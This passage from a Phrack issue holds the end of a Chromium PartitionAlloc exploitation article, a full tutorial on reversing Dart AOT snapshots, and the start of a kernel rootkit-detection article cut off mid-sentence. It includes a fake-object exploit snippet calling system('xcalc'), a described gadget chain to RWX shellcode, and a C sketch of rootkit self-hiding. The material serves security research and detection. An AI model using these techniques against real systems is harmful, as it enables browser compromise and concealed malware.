viewFakeObj.setBigUint64(0x18 + 0,
// 0x636c616378 == xcalc
0x636c616378n /* -1 because ref_count_ + 1 */ - 1n, true);
viewFakeObj.setBigUint64(0x18 + 0x8, system_addr, true);
In this case, I just call a simple `system("xcalc")`.
For a more complex exploit, we can use a sequence of more complete gadgets.
Chromium has some super powerful gadgets that allow executing shellcode
easily. You can use `blink::FileSystemDispatcher::WriteListener::DidWrite`,
followed by a fake `BindState`. With these two, we can call any function
by controlling RDI, that is, the first argument of the function.
By combining with `content::ServiceWorkerContextCore::OnControlleeRemoved`,
we can choose a function and N arguments. With this power, we call the
function `v8::base::AddressSpaceReservation::SetPermissions` and assign it
to a memory page RWX. The only thing we need to do is corrupt a second
object with a vtable and make it point to this RWX page after copying some
shellcode to it.
If you want to see a full exploit using these techniques, you can check out
the previously mentioned exploits here [11] [13].
---[ 5 - Takeaways, advances, etc etc etc
This article attempts to dissect the most important points about
PartitionAlloc and explain recent techniques like
"double-free2arbitrary-allocation", and completely new techniques like
"cross-bucket overflow".
These techniques can be used, in theory, to exploit any memory corruption
bug in PartitionAlloc, which is fascinating for weaponizing seemingly
insufficient bugs. Many of these techniques are reminiscent of tricks from
recent years in the kernel exploit scene, such as "elastic-objects" and
"cross-cache overflow". High-performance allocators tend to share
vulnerabilities inherent in their operation and performance.
As mentioned above, the memory allocator is an extremely critical
component in high-performance software like a browser, and it must be
extremely simple and fast. This simplicity comes at a cost in security.
Chromium has great security measures like "safe libc++" that can prevent
a large number of vulnerabilities, but after the first memory corruption,
the attacker's scenario is very privileged and few things can stop them.
All recent new mitigations have been focused on mitigating memory
corruptions coming from the JS engine, as is the case with the
well-crafted V8 sandbox. However, this is not enough. Although JavaScript
is an extremely bug-prone subsystem, many other areas continue to have
little research coverage.
---[ 6 - References
[1] https://www.chromium.org/blink/#what-is-blink
[2] https://en.wikipedia.org/wiki/Browser_engine
[3] https://chromium.googlesource.com/chromium/blink/
[4] https://chromium.googlesource.com/v8/v8/
[5] http://libpng.org/
[6] https://chromium.googlesource.com/webm/libvpx/
[7] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-1283
[8] https://chromium-review.googlesource.com/c/chromium/src/+/5241305/7/
third_party/blink/renderer/platform/image-decoders/bmp/bmp_image_reader.cc
[9] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#overview
[10] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#performance
[11] https://www.darknavy.org/blog/exploiting_the_libwebp_vulnerability_part_2/
[12] https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties
[13] https://securitylab.github.com/research/one_day_short_of_a_fullchain_renderer/
---[ 7 - Exploit Code
|=[ EOF ]=--------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0B of 0x11
|=-----------------------------------------------------------------------=|
|=---------------=[ Reversing Dart AOT snapshots ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ cryptax ]=--------------------------------=|
|=-----------------------------------------------------------------------=|
-- Table of contents
0 - Introduction
1 - First steps at disassembling an AOT snapshot
1.1 No entry point
1.2 Function prologue
1.3 Access to strings
1.4 Function arguments are pushed on the stack
1.5 Small integers are doubled
2 - Dart assembly registers
3 - The THR register
4 - The Dart Object Pool
5 - Snapshot serialization
6 - Representation of integers
7 - Function names
7.1 Stripped or non-stripped binaries
7.2 Trick for simple programs
7.3 Retrieving function names in more complex situations
8 - Conclusion and perspectives
-- 0 - Introduction
Dart is an object-oriented programming language with a C-style syntax, and
a few features such as sound null safety. Depending on the desired size vs
performance trade-off, a Dart program can be compiled in various formats:
kernel snapshots (the smallest, but the slowest), JIT snapshots, AOT
snapshots, and self-contained executables (the biggest and fastest) [1].
Dart AOT snapshots offer a particularly interesting ratio and are therefore
used by Flutter release builds [2]. Flutter is an open source UI software
development kit which offers the attractive ability to develop
applications with a single code-base and compile them natively for Android
and iOS, and also non-mobile platforms.
The issue for reverse engineers is that Dart AOT snapshots are notably
difficult to reverse for the following main reasons:
1. The produced assembly code uses many unique features: specific
registers, specific calling conventions, specific encoding of
integers.
2. Information about each class used in the snapshot can only be
read sequentially. There is no random access, meaning that it is
necessary to read information about lots of potentially non-
interesting classes before we get to the one we are looking for.
3. The format is not documented and has significantly evolved since
the first versions.
In this article, we will explain how to understand Dart assembly, and get
the best out of disassemblers, even when they don't support Dart.
-- 1 - First steps at disassembling an AOT snapshot
To illustrate Dart assembly code, we'll work over a simple implementation
of the Caesar algorithm in Dart (alphabet shift by 3).
We encrypt/decrypt a string containing the sentence "Phrack Issue"
followed by a randomly selected issue number.
import 'dart:math'; // for Random
class Caesar {
int shift;
Caesar({this.shift = 3});
String encrypt(String message) {
StringBuffer ciphertext = StringBuffer();
for (int i = 0; i < message.length; i++) {
int charCode = message.codeUnitAt(i);
charCode = (charCode + shift) % 256;
ciphertext.writeCharCode(charCode);
}
return ciphertext.toString();
}
String decrypt(String ciphertext) {
this.shift = -this.shift;
String plaintext = this.encrypt(ciphertext);
this.shift = -this.shift;
return plaintext;
}
}
void main() {
print('Welcome to Caesar encryption');
List<int> issues = [ 70, 71, 72 ];
Random random = Random();
final String message = 'Phrack Issue ${issues[random.nextInt(issues.length)]}';
var caesar = Caesar();
// Encrypt
String ciphertext = caesar.encrypt(message);
print(ciphertext);
// Decrypt
String plaintext = caesar.decrypt(ciphertext);
print(plaintext);
}
This source code can be compiled to the "AOT snapshot" output format (.aot
extension) using the Dart compiler:
$ dart compile aot-snapshot phrack.dart
Generated: /tmp/caesar/phrack.aot
The resulting snapshot is quite big for very simple code: 831,352 bytes
for the non-stripped version, and 541,616 bytes for the stripped version
(option -S).
Let's begin with the non-stripped AOT snapshot, and load it in a
disassembler. In this article, we'll use Radare 2 [3], but the result is
largely the same with any disassembler (IDA Pro, Binary Ninja, Ghidra...).
-- 1.1 - No entry point
First of all, the disassembler fails to identify the entry point:
ERROR: Cannot determine entrypoint, using 0x0004c000
The reason for this is that the disassembler does not understand the
format of the AOT snapshot. Actually, a "Dart AOT snapshot" contains at
least 2 snapshots: one AOT snapshot for Dart itself (Dart VM), and one
AOT snapshot per isolate.
A Dart isolate is an independent unit of execution that runs concurrently
with other isolates. Each isolate has its own memory heap, stack and event
loop. There is always at least 1 isolate, possibly more if the application
needs to handle background tasks while displaying other data, for instance.
In the example below, the file contains the minimum 2 snapshots:
$ objdump -T ./phrack.aot
./phrack.aot: file format elf64-x86-64
DYNAMIC SYMBOL TABLE:
000000000004c000 g DO .text 0000000000006860 _kDartVmSnapshotInstructions
0000000000052880 g DO .text 0000000000046910 _kDartIsolateSnapshotInstructions
0000000000000200 g DO .rodata 0000000000008a10 _kDartVmSnapshotData
0000000000008c40 g DO .rodata 000000000003f9d0 _kDartIsolateSnapshotData
00000000000001c8 g DO .note.gnu.build-id 0000000000000020 _kDartSnapshotBuildId
Radare arbitrarily sets 0x4c000 as the entry point because it is the
address of the first symbol (kDartVmSnapshotInstructions). In reality,
the main() of our Dart program is contained in a Dart isolate snapshot,
and therefore its code is expected to be found within the text segment
named kDartIsolateSnapshotInstructions.
Fortunately, if the executable is not stripped, we can search for main in
function names to locate our entry point:
[0x0004c000]> afl~main
0x00096b3c 8 351 main
0x00097268 3 33 sym.main_1
sym.main_1 is a low-level main() - just like __libc_start_main in C. The
real entry point for the Dart program is "main" at 0x00096b3c. In Radare,
we go to that address with the command "s" followed by the offset, and
retrieve the name of the current symbol with "is.". You can see that
main() is indeed in kDartIsolateSnapshotInstructions:
[0x0004c000]> s main
[0x00096b3c]> is.
nth paddr vaddr bind type size lib name demangled
2 0x00052880 0x00052880 GLOBAL OBJ 289040 _kDartIsolateSnapshotInstructions
-- 1.2 - Function prologue
The function prologue saves the base pointer on the stack and allocates
some space. Then, there is an instruction comparing the stack pointer with
an offset from register r14. What is this doing?
push rbp
mov rbp, rsp
sub rsp, 0x30
cmp rsp, qword [r14 + 0x38]
This is a Dart specificity that we'll discuss later. Let's first ask all
the questions.
-- 1.3 - Access to strings
Our program outputs the welcome message "Welcome to Caesar encryption". We
expect to see those ASCII characters loaded in the main at some point. For
example, in the assembly produced by a similar C program, we have:
lea rax, str.Welcome_to_Caesar_encryption
mov rdi, rax
call sym.imp.puts
The bytes at the address of symbol str.Welcome_to_Caesar_encryption are
the ASCII characters of the string. Reciprocally, if we search cross
references for this string ("axt"), we get the address of the lea
instruction:
[0x000012c2]> s str.Welcome_to_Caesar_encryption
[0x00002004]> px 20
- offset -   4 5  6 7  8 9  A B  C D  E F 1011 1213  456789ABCDEF0123
0x00002004 5765 6c63 6f6d 6520 746f 2043 6165 7361 Welcome to Caesa
0x00002014 7220 656e r en
[0x00002004]> axt
main 0x139b [DATA:r--] lea rax, str.Welcome_to_Caesar_encryption
With the Dart assembly, we have no such thing. Below are the instructions
before the first call to print(). One way or another, the string "Welcome
to Caesar encryption" has to be provided, but we can't see it. We can only
assume it is referenced by r15 + 0x168f, but what is r15, and where does
that go?
mov r11, qword [r15 + 0x168f]
mov qword [rsp], r11
call sym.printToConsole
From another angle, we do find the string in the list of strings ("iz") at
address 0x00033680, but there is apparently no reference to it ("axt" does
not return any hit):
[0x00096b3c]> iz~Welcome
2589 0x00033680 0x00033680 28 29 .rodata ascii Welcome to Caesar encryption
[0x00096b3c]> axt @ 0x00033680
So, this is yet another mystery to solve: how are strings accessed? What
is in r15? What is at r15 + 0x168f?
-- 1.4 - Function arguments are pushed on the stack
There is something else to notice in the Dart assembly above. Normally,
at least the first few arguments of a function are copied to dedicated
registers (the exact registers depend on the platform architecture). In
Dart assembly, notice how function arguments are copied on the stack:
mov qword [rsp], r11
call sym.printToConsole
The argument for the method printToConsole() is in r11. This argument is
copied to the address pointed at by rsp, the register stack pointer. This
does not follow standard conventions [4]. We'll even allow ourselves to
digress slightly: On x86-64, rsp is the name of the register holding a
pointer to the stack. On Aarch64, there is normally no such
general-purpose register, so Dart picks one, X15, to use as its stack
pointer.
-- 1.5 - Small integers are doubled
In the Dart assembly code, just after the call to printToConsole, we
notice startling instructions concerning an array:
call sym.printToConsole
mov rbx, qword [r14 + 0x68]
mov r10d, 6
call sym.stub__iso_stub_AllocateArrayStub
mov qword [var_8h], rax
mov r11d, 0x8c
mov qword [rax + 0x17], r11
mov r11d, 0x8e
mov qword [rax + 0x1f], r11
mov r11d, 0x90
mov qword [rax + 0x27], r11
Our Dart source code has a single array: the array of Phrack issues with
values 70, 71 and 72 (in hexadecimal: 0x46, 0x47 and 0x48):
List issues = [ 70, 71, 72 ];
Instead, the code appears to be loading values 0x8c, 0x8e and 0x90. Why?
This is the final mystery we'll solve in this article.
-- 2 - Dart assembly registers
In our previous experiments, we have encountered r14, r15, and we also
discussed X15 on Aarch64. The source code explains what these registers
are assigned to. For example, this is an excerpt of defined constants for
the x86-64 platform:
enum Register {
RAX = 0,
RCX = 1,
RDX = 2,
RBX = 3,
RSP = 4, // SP
RBP = 5, // FP
RSI = 6,
RDI = 7,
R8 = 8,
R9 = 9,
R10 = 10,
R11 = 11, // TMP
R12 = 12, // CODE_REG
R13 = 13,
R14 = 14, // THR
R15 = 15, // PP
...
}
...
// Caches object pool pointer in generated code.
const Register PP = R15;
...
const Register THR = R14; // Caches current thread in generated code.
The comments are particularly helpful. We learn that Dart features a
dedicated register pointing to the Object Pool (PP), and another
pointing to the current thread (THR). On Aarch64, the comments
explicitly assign x15 as the Stack Pointer (SP), "SP in Dart code". The
other registers, like the Frame Pointer (FP), Link Register (LR) and
Program Counter (PC), use the default values for their architecture:
+ ------------ + ----- + ----- + ----- +
| | PP | THR | SP |
+ ------------ + ----- + ----- + ----- +
| x86-64 | r15 | r14 | rsp |
| Aarch32 | r5 | r10 | r13 |
| Aarch64 | x27 | x26 | x15 |
+ ------------ + ----- + ----- + ----- +
-- 3 - The THR register
We just said Dart dedicates a register to holding a pointer to the
current running thread. This is interesting in a reverse engineering
context because the offsets to various elements are known. For example,
we know that the stack limit is at THR + 0x38 (see: Dart SDK source code;
in runtime/vm/compiler/runtime_offsets_extracted.h, search for
Thread_stack_limit_offset).
This helps us solve the mystery we mentioned in 1.2. On x86-64, the THR
register is held by r14. So, the last assembly line compares the stack
pointer with the stack limit:
push rbp ; save base pointer on the stack
mov rbp, rsp ; update base pointer
sub rsp, 0x30 ; allocate space on the stack
cmp rsp, qword [r14 + 0x38] ; compare with stack limit
In other words, the last instruction ensures that the operations we
perform on the stack do not go beyond its limit, i.e. that there is no
stack overflow.
Similarly, we find that THR + 0x68 is a null object. So, the instructions
below actually pass a null object as argument to the constructor of the
Random class:
mov r11, qword [r14 + 0x68] ; store null object in r11
mov qword [rsp], r11 ; push r11 on the stack
call sym.new_Random ; call constructor for Random()
-- 4 - The Dart Object Pool
The Object Pool is a table which stores and references frequently used
objects, immediates and constants within a Dart program.
For example, this is an excerpt of an Object Pool. See how it contains
objects (InternetAddressType), strings ("Unexpected address type"),
lists, etc:
[pp+0x170] Obj!InternetAddressType@3a7c81 : {
off_8: int(0x2)
}
[pp+0x178] String: "Unexpected address type "
[pp+0x180] String: "%"
[pp+0x188] List(5) [0, 0x2, 0x2, 0x2, Null]
[pp+0x190] List(5) [0, 0x3, 0x3, 0x3, Null]
In the assembly code, objects from the Object Pool are not accessed by
their direct addresses, but by an offset from the beginning of the pool.
The pool's base address is held by the dedicated PP register.
Let's go back to our string mystery (1.3), when we wondered where the
input string "Welcome to Caesar encryption" was. Such a string is held
in the Object Pool. In x86-64, the register to access the pool is r15.
We spot it just before the call to the encrypt() method. The instruction
loads an object from the object pool at offset 0x168f, and passes it on
the stack as an argument to printToConsole().
mov r11, qword [r15 + 0x168f]
mov qword [rsp], r11
call sym.printToConsole
As this is our first print, and we know it prints "Welcome to Caesar
encryption", we deduce the string is referenced in the Object Pool at
this offset. But this deduction only works because our program is
trivial: if the reverse engineering were more complex, we'd have nothing
to guide us. The real issue is that disassemblers do not read the
Object Pool and cannot tell us what lies at a given offset.
-- 5 - Snapshot serialization
Why aren't disassemblers reading the Object Pool? What's difficult about
that? To answer this question, we need to explain the AOT snapshot format.
A Dart AOT snapshot consists of:
- A Header. It holds a magic value (0xdcdcf5f5), the snapshot size, kind
and hash. The snapshot hash identifies the Dart SDK version.
- A Cluster Information structure. A cluster is a set of objects with
the same Dart type. For example, the structure contains the number
of clusters.
- Several serialized clusters. This is a raw dump of each cluster:
+----------------------------- +
+ Dart AOT Header +
+ ---------------------------- +
+ Cluster Information +
+ ---------------------------- +
+ Serialized Cluster 1 +
+ ---------------------------- +
+ Serialized Cluster 2 +
+ ---------------------------- +
+ Serialized Cluster 3 +
+ ---------------------------- +
+ ... +
+ ---------------------------- +
For reverse engineering, we wish to parse the AOT snapshot format.
Reading the header is easy. This is the snapshot header of our Phrack
AOT snapshot, parsed with a Flutter header parser[5]:
-----------
Snapshot
offset = 35904 (0x8c40)
size = 92106
kind = SnapshotKindEnum.kFullAOT
dart sdk version = 3.3.0
features= product no-code_comments no-dwarf_stack_traces_mode
no-lazy_dispatchers dedup_instructions no-tsan no-asserts x64 linux
no-compressed-pointers null-safety
-----------
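As a rough C sketch (our own reconstruction; the exact field widths and
alignment must be checked against the Dart SDK for the target version),
the parsed fields map to something like:

#include <stdint.h>

struct dart_snapshot_header {      /* field widths are our guess */
    uint32_t magic;                /* 0xdcdcf5f5 */
    int64_t  size;                 /* snapshot size in bytes */
    int64_t  kind;                 /* e.g. kFullAOT */
    char     version_hash[32];     /* identifies the Dart SDK version */
    /* ... followed by a NUL-terminated features string ... */
};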
Reading the Cluster Information is slightly more difficult because it
uses a custom LEB128 format, but once we're aware of that, it poses no
more difficulty.
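For reference, standard unsigned LEB128 decoding looks like the C sketch
below; since the snapshot uses a custom variant, the precise encoding
details must be taken from the Dart SDK itself:

#include <stddef.h>
#include <stdint.h>

/* Standard ULEB128: 7 value bits per byte, high bit = continuation. */
static uint64_t uleb128_decode(const uint8_t *buf, size_t *pos)
{
    uint64_t result = 0;
    int shift = 0;
    uint8_t byte;

    do {
        byte = buf[(*pos)++];
        result |= (uint64_t)(byte & 0x7f) << shift;
        shift += 7;
    } while (byte & 0x80);

    return result;
}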
The complexity lies with reading serialized clusters. While we are mostly
interested in the serialized Object Pool (yes, the Object Pool is a Dart
type, therefore it is serialized in its own cluster), the Dart SDK has
over 150 clusters. Unfortunately, there is no way to jump straight to a
given cluster (e.g. the Object Pool): we must de-serialize each cluster
one by one until
we reach the one we are interested in. Said differently, there is no
random access in the snapshot, only sequential access. So, to de-serialize
the Object Pool, we must actually implement de-serialization of all
clusters, because we have no idea which cluster will be dumped before the
Object Pool.
This is a lot of work, and an additional issue is that the Dart AOT
format is not officially documented and continues to evolve with new
Dart SDK versions. New versions change flags (for example, the header
flag which used to indicate a "generic snapshot" is now used to
identify an AOT snapshot), and many new clusters have appeared. This is
why tools such as Darter [6] and Doldrums [7] unfortunately no longer
work. In theory,
those tools could be ported to the current Dart SDK version, but it would
require extensive work, and we do not know how long that work would remain
operational.
To circumvent this issue, Blutter [8] uses another strategy. It implements
a Dart AOT snapshot dumper, compiled with the appropriate Dart SDK, and
uses it to parse the input snapshot. The tool reads the Object Pool and
dumps annotated assembly code. It is currently, however, limited to
Flutter applications for Android on Aarch64.
-- 6 - Representation of integers
Dart actually supports 2 types of integers: small integers (SMI) and
bigger integers, called "Mint" for Medium Integer. Small
integers fit in 31 bits. If they don't fit, they use the Mint type. The
least significant bit is reserved as an indicator: 0 for SMI, and 1 for
Mint:
+ -------------------------------- + - +
| 31 30 29 ..................... 1 | 0 |
+ -------------------------------- + - +
| Value | I |
+ -------------------------------- + - +
The immediate consequence of this design choice is that all small
integers appear in the assembly with their value multiplied by 2.
If we go back to the assembly of 1.5, the instructions appear to be
loading values 0x8c, 0x8e and 0x90:
mov r10d, 6
call sym.stub__iso_stub_AllocateArrayStub
mov qword [var_8h], rax
mov r11d, 0x8c
mov qword [rax + 0x17], r11
mov r11d, 0x8e
mov qword [rax + 0x1f], r11
mov r11d, 0x90
mov qword [rax + 0x27], r11
However, if we look more closely with Dart's representation in mind,
the least significant bit of each of those values is 0. Thus, they are
SMIs, and their values fit on bits 1-31. The represented values are
consequently 0x8c / 2 = 70, 71 and 72 - which are the 3 integers we put
in our integer array.
The same applies to the first instruction: the apparent value of 6 is
provided as an argument to the array stub function. This is an SMI, so
we are initializing an array of 3 cells (6 divided by 2).
For reverse engineering, knowing about this integer representation is
particularly useful when strings are represented as lists of ASCII code
values. Since the ASCII code for character A is 0x41, the assembly will
actually need to load a hexadecimal literal of 0x82.
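As a small illustration (our own C sketch, not Dart SDK code), encoding
and decoding SMIs is just a shift:

#include <stdint.h>
#include <stdio.h>

/* Dart SMI tagging as described above: value << 1, low bit clear. */
static uint64_t smi_encode(int64_t value) { return (uint64_t)value << 1; }
static int64_t  smi_decode(uint64_t raw)  { return (int64_t)raw >> 1; }
static int      is_smi(uint64_t raw)      { return (raw & 1) == 0; }

int main(void)
{
    uint64_t raw = 0x8c; /* literal seen in the assembly above */
    if (is_smi(raw))
        printf("0x%llx decodes to %lld\n", /* prints: 0x8c decodes to 70 */
               (unsigned long long)raw, (long long)smi_decode(raw));
    return 0;
}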
In Radare, the representation of Small Integers can be handled by a simple
r2pipe script [9]. For example, in the assembly below, the comments for
the 3 small integers were generated by the script:
mov r11d, 0x8c ; Load 0x46 (decimal=70, character="F")
mov qword [rax + 0x17], r11
mov r11d, 0x8e ; Load 0x47 (decimal=71, character="G")
mov qword [rax + 0x1f], r11
mov r11d, 0x90 ; Load 0x48 (decimal=72, character="H")
mov qword [rax + 0x27], r11
-- 7 - Function names
-- 7.1 - Stripped or non-stripped binaries
When Dart AOT snapshots are not stripped, disassemblers easily find
function names. For example, these are all methods of the Caesar class:
[0x0009ec7c]> afl~Caesar
0x00096c9c 3 80 sym.Caesar.decrypt
0x00096d28 10 245 sym.Caesar.encrypt
0x00096e20 1 11 sym.new_Caesar
But, naturally, AOT snapshots can be stripped (-S option at
compilation time); disassemblers are then unable to recover function
names and generate dummy names instead:
0x00050d34 20 490 fcn.00050d34
0x0005a0d8 3 121 fcn.0005a0d8
0x0005c440 6 129 fcn.0005c440
0x0007d210 1 30 fcn.0007d210
0x000768d0 1 90 fcn.000768d0
It is then particularly difficult to spot the main() or methods of the
Caesar class. They (probably) won't be at the same address, and there is
no easy way to locate them, as the assembly code contains no noticeable
string, no access to the Object Pool and no function name.
-- 7.2 - Trick for simple programs
In simple programs, we can search for particular instructions. For
example, our main() initializes an array of integers. Assigning the
first value is done with the instruction "mov r11d, 0x8c". We can search
for this instruction.
Note this technique is unlikely to yield good results in a real reverse
engineering situation, because (1) we don't know what to look for, (2) we
don't have access to the non-stripped version, and (3) searching for an
instruction will return too many hits.
In the case of our simple Caesar program, the trick works and we are
extremely lucky to have a single hit:
[0x0007451f]> /ad mov r11d, 0x8c
0x000744b5 41bb8c000000 mov r11d, 0x8c
With several hits, we would have had to inspect the assembly lines
around each hit and check whether they match what the main() is
expected to do.
We recognize the main as function fcn.00074480 (in Radare, the command
"afi" tells you which function you are in, and "pi 15" disassembles 15
instructions):
[0x00034000]> s 0x000744b5
[0x000744b5]> afi~name
name: fcn.00074480
[0x000744b5]> s fcn.00074480
[0x00074480]> pi 15
push rbp
mov rbp, rsp
sub rsp, 0x28
cmp rsp, qword [r14 + 0x38]
jbe 0x745cd
mov r11, qword [r15 + 0x166f]
mov qword [rsp], r11
call fcn.00074ac4
mov rbx, qword [r14 + 0x68]
mov r10d, 6
call fcn.0007e968
mov qword [var_8h], rax
mov r11d, 0x8c
mov qword [rax + 0x17], r11
mov r11d, 0x8e
-- 7.3 - Retrieving function names in more complex situations
There are currently 3 workarounds:
1. JEB Pro Disassembler [10]. It is able to read the Object Pool and
retrieve function names in most situations. However, the tool is not
free and a license must be purchased.
2. reFlutter [11]. This open source tool patches the Flutter library to
dump function name offsets when it runs into them. The drawback with
this tool is that (1) it only works with Flutter applications, not
plain Dart snapshots, (2) the application needs to be recompiled with
the patched library, and (3) it is a dynamic analysis approach,
meaning reFlutter actually runs the application and only dumps the
parts it reaches.
3. Blutter [8] is another open source tool we have already mentioned.
It dumps assembly code with function names and their corresponding
offset. The tool currently only supports Android Flutter applications
generated for Aarch64.
For example, I created a basic Flutter application with a widget
implementing the Caesar algorithm. The application has a class MyApp,
with a constructor and 2 methods: build(), which creates the widget, and
work() which performs Caesar encryption/decryption. I compiled the
application for Android Aarch64 and used Blutter on it:
// class id: 1442, size: 0xc, field offset: 0xc
// const constructor,
class MyApp extends StatelessWidget {
_ build(/* No info */) {
// ** addr: 0x221aec, size: 0x120
// 0x221aec: EnterFrame
// 0x221aec: stp fp, lr, [SP, #-0x10]!
// 0x221af0: mov fp, SP
// 0x221af4: AllocStack(0x28)
// 0x221af4: sub SP, SP, #0x28
// 0x221af8: CheckStackOverflow
// 0x221af8: ldr x16, [THR, #0x38] ; THR::stack_limit
...
_ work(/* No info */) {
// ** addr: 0x221c24, size: 0x288
// 0x221c24: EnterFrame
...
The dumped assembly shows:
- The address of build(): 0x221aec
- The address of work(): 0x221c24
- And the instructions for both methods.
The instructions are annotated with the function name or the pool
object where applicable, making the assembly easier to understand. For
example, see how Blutter shows the string "Welcome to Caesar encryption":
// 0x221c78: r16 = "Welcome to Caesar encryption"
// 0x221c78: ldr x16, [PP, #0x6e40] ; [pp+0x6e40] "Welcome to Caesar encryption"
// 0x221c7c: str x16, [SP]
// 0x221c80: r0 = printToConsole()
// 0x221c80: bl #0x159df4 ; [dart:_internal] ::printToConsole
Finally, remember that earlier we noticed the x86-64 assembly was passing
a null object, via THR + 0x68, as an argument to the constructor of the
Random class. In Blutter, we see the assembly for Aarch64 is different.
It doesn't use the THR register for that and explicitly passes NULL:
// 0x221cac: str NULL, [SP]
// 0x221cb0: r0 = Random()
// 0x221cb0: bl #0x206268 ; [dart:math] Random::Random
Overall, Blutter's annotations make the assembly easier to read; it
would be helpful to have them for other platforms, and to see the same
features integrated into disassemblers.
-- 8 - Conclusion and perspectives
With this article, you should be able to understand the format of Dart
AOT snapshots, and grasp the complexity of parsing the Object Pool or
de-serializing any cluster.
We have explained the use of the dedicated THR and PP registers. You are
able to understand the assembly of function prologues, how strings or any
other object of the object pool is loaded, and how lists of integers are
represented.
We have also provided tricks and tools to parse the Object Pool and
recover function names, even in the case of stripped snapshots.
Major disassemblers are likely to add support for Dart in the next few
months or years. However, this is really only viable if the Dart SDK
becomes stable enough for such work to be worth it. Meanwhile, we seem
better off integrating strategies such as Blutter's, which recompile
tools from the Dart SDK.
-- References
[1] https://dart.dev/tools/dart-compile#types-of-output
[2] https://flutter.dev
[3] https://www.radare.org/
[4] https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions
[5] https://github.com/cryptax/misc-code/blob/master/flutter/flutter-header.py
[6] https://github.com/mildsunrise/darter
[7] https://github.com/rscloura/Doldrums
[8] https://github.com/worawit/blutter
[9] https://github.com/cryptax/misc-code/blob/master/flutter/dart-bytes.py
[10] https://pnfsoftware.com
[11] https://github.com/Impact-I/reFlutter
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0C of 0x11
|=-----------------------------------------------------------------------=|
|=-[ Finding hidden kernel modules (extrem way reborn): 20 years later ]-=|
|=-----------------------------------------------------------------------=|
|=------------------[ g1inko ]-------------------=|
|=-----------------------------------------------------------------------=|
0 intro
1 Some words on LKM-rootkits
2 On existing tools
2.1 Some words on the original module_hunter
2.2 rkspotter and __module_address() problem
2.3 Other challenges in adopting _that_ extrem way
3 The rebirth
3.1 Detecting a stray struct module
3.2 On virtual memory of x86_64 architecture
3.3 Paging levels while solving the 'problem of unmapped'
4 Other architectures and outro
5 References
6 The code
0 intro
=======
Several years ago, while trying to get a grasp on Linux kernel rootkits,
I came across an old Phrack Linenoise article [1] that discussed an
interesting way of finding them. It totally caught my attention, even
though it was so mysterious and far beyond my knowledge and experience
back then.
It took me some time to fill in the gaps in my knowledge. Eventually I
realized I was ready to reimplement the idea of finding hidden kernel
modules in memory for modern kernels and x86_64 machines. Now, 20 years
after the original publication, I am somewhat proud to finally share the
rebirth of this technique, with all the honors to madsys for inspiration.
1 Some words on LKM-rootkits
============================
Since the first publication (known to me, at least) about Linux kernel
rootkits in Phrack in April 1997 [2], and right up to this day, malicious
loadable kernel modules (LKM-rootkits) all tend to use the same self-
hiding technique, namely unlinking themselves from the in-kernel linked
list of loaded modules. This prevents the module from showing up in procfs
and lsmod, and rmmod is unable to find and unload such modules.
Some rootkits also try to mess with the memory afterwards, to make
forensics even harder. For example, since version 2.5.71, Linux poisons
stale list pointers of the unlinked struct by setting them to LIST_POISON1
and LIST_POISON2 (0x00100100 and 0x00200200). This is used to help detect
memory bugs.
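For reference, this is essentially what list_del() does in
include/linux/list.h (lightly simplified):

static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next); /* unlink from the list */
        entry->next = LIST_POISON1;           /* poison the stale links */
        entry->prev = LIST_POISON2;
}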
Some anti-rootkits use this to detect unlinked LKM descriptors, thus
detecting a kernel rootkit. However, a rootkit can overwrite these values
after unlinking and evade this check. For instance, the KoviD LKM that
appeared in 2022 [3] does this.
Also, despite the fact that LKM rootkits do unlink themselves from the
modules list, they still can be listed via sysfs in /sys/module. This is
even mentioned in the Volatility documentation [4] and is an established
method for detecting such rootkits. Although Volatility developers claim
to never have faced a rootkit that would also remove itself from
sysfs, the KoviD rootkit does exactly that.
For that, KoviD uses the sysfs_remove_file() helper, and sets its state to
MODULE_STATE_UNFORMED. This state is for cases when a module is still
setting up, and the kernel module loader is still running. This trick
helps to evade anti-rootkits that rely on the kernel __module_address()
function when enumerating virtual memory, such as rkspotter [5].
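Put together, a self-hiding sequence along these lines could look like
the following hedged sketch (our illustration, not KoviD's actual code;
we use kobject_del() where KoviD goes through the sysfs_remove_file()
helper):

static void hide_self(void)
{
    list_del(&THIS_MODULE->list);          /* gone from lsmod and procfs */
    THIS_MODULE->list.next = NULL;         /* scrub LIST_POISON1 */
    THIS_MODULE->list.prev = NULL;         /* scrub LIST_POISON2 */
    kobject_del(&THIS_MODULE->mkobj.kobj); /* gone from /sys/module */
    THIS_MODULE->state = MODULE_STATE_UNFORMED; /* evade state checks */
}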
2 On existing tools
===================
2.1 Notes on the original module_hunter
---------------------------------------
The original implementation was created in the era of Linux 2.2-2.4
for i386 machines. Today it is Linux ~6.8 and mostly x86_64 systems.
Many things have changed or been removed, and new features have been
introduced. The kernel is known to have a highly unstable internal API,
so it is no surprise that the 20-year-old module_hunter.c wouldn't
build anymore. But by understanding how it works, it turns out to be
possible to reimplement the technique for a modern kernel.
In short, the logic for finding a malicious LKM was to go through the
memory region that contained module structs, and dump the info if it
contained anything that looked like a sane struct module. At the time,
this struct had way fewer fields than it does today, as it has been
heavily reworked and extended over the years.
For example, there is no more 'size' field, but many others were added.
It is interesting that module's name at that time was stored using a
pointer, while nowadays it is a static array of chars right within the
struct module.
2.2 rkspotter and __module_address() problem
--------------------------------------------
While searching for a way to probe memory addresses safely via brute
force, I found the aforementioned anti-rootkit named rkspotter. It
detects several hiding techniques, which allows it to find rootkits
even if one of the methods fails, but it relies on the kernel's
__module_address() function.
This function was unexported in 2020 during a series of kernel patches
[6], and has been unavailable to out-of-tree code since Linux 5.4.118.
This means that we must avoid using it as well.
The core idea of rkspotter is to go through the so-called module mapping
space, and check which address belongs to which module using
__module_address(). According to the doc, it lets one 'get the module which
contains an address'.
For a given address, __module_address() returns a struct module pointer of
a corresponding LKM. This function was a convenient way to get module info,
all the work for dereferencing page tables and checking for physical page
presence was done internally.
Well yes, I know that I could try to copycat this __module_address() in the
